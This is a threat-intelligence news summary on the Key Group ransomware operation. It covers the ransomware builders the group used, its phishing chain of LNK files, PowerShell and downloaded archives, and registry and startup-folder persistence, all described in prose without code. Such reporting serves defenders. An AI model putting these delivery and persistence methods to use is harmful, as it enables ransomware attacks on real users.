Key Group, a financially motivated cybercrime group, has been active since at least April 2022, as they initially used the Xorist ransomware builder and switched to Chaos builder in August 2022, which primarily targeted Russian users and used various techniques to evade detection and persistence on victim machines.
In 2023, the group experimented with different ransomware strains, including Annabelle, Slam, RuRansom (wiper), and UX-Cryptor, before settling on Hakuna Matata in February 2024. Most recently, they were observed using the Judge/NoCry ransomware in March 2024.
It employed a multi-stage attack to deliver Chaos and Xorist ransomware to victims by distributing LNK files via phishing emails, which executed PowerShell commands to download self-extracting archives containing ransomware loaders, which downloaded additional archives containing the ransomware payloads.
The ransomware variants were identical in their notes, as previous research revealed a similar attack using a .NET WebClient to download Chaos from a GitHub repository, which also hosted other malware like RuRansom, Hakuna Matata, J-Ransomware/LoveYou, and NjRat.
The ransomware samples Xorist, Chaos, Annabelle, and UX-Cryptor employ various persistence techniques to ensure their continued execution upon system reboot, where Xorist modifies file extension associations to launch itself when encrypted files are opened.
Chaos creates a new process that adds itself to the startup folder, Annabelle adds itself to the Run and Winlogon registry keys, and UX-Cryptor modifies registry keys and adds multiple executable files to the startup folder.
NoCry adds itself to the startup folder, which allows the ransomware to re-infect the system even after removal, making it difficult to eradicate completely.
The Key Group ransomware operation likely originated from a Russian-speaking spam group called “huis,” as they used leaked builders to create ransomware and targeted Russian users.
Early versions used the “.huis_bn” extension and referenced “huis” in ransom notes. Code analysis revealed connections between the group and “json1c” and “Bloody-Lord Destroyer-Crew” on Telegram.
The group used a closed Telegram channel for communication and previously had an open channel for updates and victim interaction. It may still be active as they uploaded new malware samples in February 2024.
According to Secure List, Key Group is a hacktivist group that leverages leaked ransomware builders and a GitHub repository as its primary C2 channel. This approach, common among hacktivist groups, simplifies tracking their activities.
The increasing availability of ransomware source code has contributed to the growth of groups using leaked builders or ransomware source code, which is expected to continue, leading to a proliferation of such groups in the future.